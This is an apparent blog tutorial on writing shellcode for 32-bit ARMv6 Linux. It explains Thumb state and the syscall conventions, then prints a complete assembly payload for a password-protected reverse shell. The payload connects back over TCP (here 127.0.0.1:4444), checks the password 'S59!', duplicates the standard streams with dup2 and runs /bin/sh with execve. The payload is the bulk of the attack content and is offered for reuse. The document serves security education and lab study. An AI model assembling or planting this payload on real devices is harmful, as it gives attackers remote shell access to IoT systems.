Developing Shellcode for IoT: A Password-Protected Reverse Shell for ARM Processors

After having written a similar payload for Linux/Intel x64 I was curious about how to apply this knowledge for other architectures so I decided to go with ARM since it’s an interesting and wide-spread one.

About ARM

ARM is a Reduced Instruction Set Computing (RISC) processor architecture that is used everywhere these days: mobile phones, smart thermostats, tv’s, wi-fi dongles, cars, credit cards, you name it.

How does ARM compare against Intel x86?

Here are some key takeaways:

Being ARM a RISC processor it has a simplified instruction set that is just a fraction of its 32-bit Intel counterpart, the x86.
While on x86 most instructions are allowed to access/operate memory, on ARM the data must be moved from memory into registers before being operated on. Most ARM instructions operate only on registers.Only Load/Store instructions can access memory.
ARM has two main instruction set states ARM and Thumb. Thumb instructions are 2 bytes long most of the time while in ARM state instructions are always 4 bytes long. For shellcode writing, Thumb state is the de facto as it saves space and avoids a lot of null bytes.
The ARM instruction has a limited range of immediate values available to be used directly with a mov instruction. If a number is out of this range it can’t be used directly and must, therefore, be split into parts and loaded using several operations/values.

How do I switch to Thumb state?

In order to switch to Thumb state, we can make use of the Branch and Exchange instruction (bx) after having set the destination register’s least significant bit to 1. This can be achieved by adding 1 to the Program Counter (pc register) while on ARM state.

<some arm code>
 ...
// Here we are running on ARM state
 add r0, pc, #1
// Increase value of PC by 1 and place the result into r0
 bx  r0
// Branch & Exchange to the address in r0
// This will make the switch to Thumb state because the LSB of r0 = 1
// From here on we can execute Thumb state instructions!
 <some thumb code>
 ...

From now one all the coding will be done in Thumb state since this is the relevant state for writing shellcode.

Setting up the lab

First of all, we’ll need a lab to run our tests on. Here are some options for it:

1.You can go for the real deal and test the payload on a real Raspberry Pi 1.

2. You can build/run an emulated environment using Qemu. Since I used the Qemu armv6_stretch image from this repo I’d recommend you use the same setup. It pretty much works off-the-shelf, don’t worry.

3. You could download and use the VM provided by Azeria Labs.

Writing the payload

Stage One: General Overview

First of all, what are we trying to achieve here? Our goal is to write shellcode for the Linux 32-bit ARMv6 architecture that will connect back to a remote location over TCP/IPv4 and provide a shell only after the remote client provides a valid password. In order to write the payload, we need to chain several syscalls. The exact order is the following:

We create a new socket to manage the new connection.
We connect to the target address.
We read from the socket and check if the provided password is correct.
We duplicate each standard stream into the new connection stream using the dup2 syscall, so the target machine can read and write messages to and from the source machine.
We start a shell by using the execve syscall.

Each of these syscalls has a signature we need to address. Certain registers must contain specific values. For example, the r7 register is used to identify the syscall that is executed so it should always contain the syscall number. A whole document containing a full syscall table can be found here.

Photo credit: Webaroo.com.au

Stage Two: Writing a Syscall

Let’s see an example of how to write a syscall in ARM Thumb state. We’ll use the socket syscall:

         // [281] socket(2, 1, 0) 
02 20    mov   r0, #2    // loads immediate value 2 into r0
01 21    mov   r1, #1    // loads immediate value 1 into r1
52 40    eor   r2, r2    // zero-outs r2 by xoring it with itself
                         // 281 is out of range for immediate values
                         // It must be loaded in parts
c8 27    mov   r7, #200  // part1: loads immediate value 200 into r7
51 37    add   r7, #81   // part2: adds 81 to r7 as (syscall number)
01 df    svc   #1        // issues the syscall

Here you can see:

The r7 register being used identifying the syscall
Registers r0,r1, and r2 used as parameters for the syscall
An example of how to deal with immediate values that are out of range
The use of svc instruction to perform a system call

Stage Three: Writing the full payload

Armed with all our knowledge we are now prepared to chain every syscall and put together our payload. The following Gist was extracted from the source code on my main repository:

// Password-Protected Reverse Shell Linux/ARMv6
// Author: Alan Vivona
// medium.syscall59.com
// @syscall59

.section .text
.global _start
_start:

.arm
    add   r3, pc, #1 // switch to thumb mode 
    bx    r3

.thumb

// [281] socket(2, 1, 0) 
    mov   r0, #2
    mov   r1, #1
    eor   r2, r2
    mov   r7, #200
    add   r7, #81
    svc   #1
mov   r10, r0 // save sockfd into r10

// [283] connect(socketfd, target, addrlen) 
    // socket fd is in r0 already
    adr   r1, target
    strb  r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
    strb  r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
    strb  r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
    mov   r2, #16
    add   r7, #2  // 281 + 2 = 283
    svc   #1

// [003] read(sourcefd, destbuffer, amount)
    push  {r1}
    mov   r1, sp
    mov   r2, #4
    mov   r7, #3
    read_pass:
        mov   r0, r10
        svc   #1
    check_pass:
        ldr   r3, pass
        ldr   r4, [r1]
        eor   r3, r3, r4
    bne read_pass

// [063] dup2(sockfd, stdIO) 
    mov   r1, #2  // r1 = 2 (stderr)
    mov   r7, #63 // r7 = 63 (dup2)
    loop_stdio:
        mov   r0, r10 // r0 = saved sockfd 
        svc   #1
        sub   r1,#1
    bpl loop_stdio    // loop while r1 >= 0 

// [011] execve(command, 0, 0) 
    adr   r0, command
    eor   r2, r2
    eor   r1, r1
    strb  r2, [r0, #7]
    mov   r7, #11 
    svc   #1

// 2 bytes aligment fix if needed (can't use a nop as it has a null byte)
// align_bytes : .byte 0xff, 0xff

target:
    // The 0xff will be replaced with a null on runtime
    .ascii "\x02\xff"   // Protocol: IPv4/TCP. 
    
    .ascii "\x11\x5c"   // Port : 4444 
    
    // The '255' will be replaced with a 0 on runtime
    .byte 127,255,255,1 // IP: 127.0.0.1. 
    
command: .ascii "/bin/sh?"  // The '?' will be replaced with a null on runtime

pass: .ascii "S59!"

Testing

When testing the payload take in consideration that it was crafted for Linux 32-bit ARMv6 (the same chip the Raspberry Pi 1 has). Some quirks may be needed for it to work on other platforms/architectures. In the following video, you can see the whole process of booting up the Qemu armv6 image, assembly of the payload and, finally, the test:

https://vimeo.com/331280681

That’s all! Hope you enjoyed this one!

The full source code can be found on my GitHub repo and Exploit-DB. Follow me on Twitter and Medium for more content like this!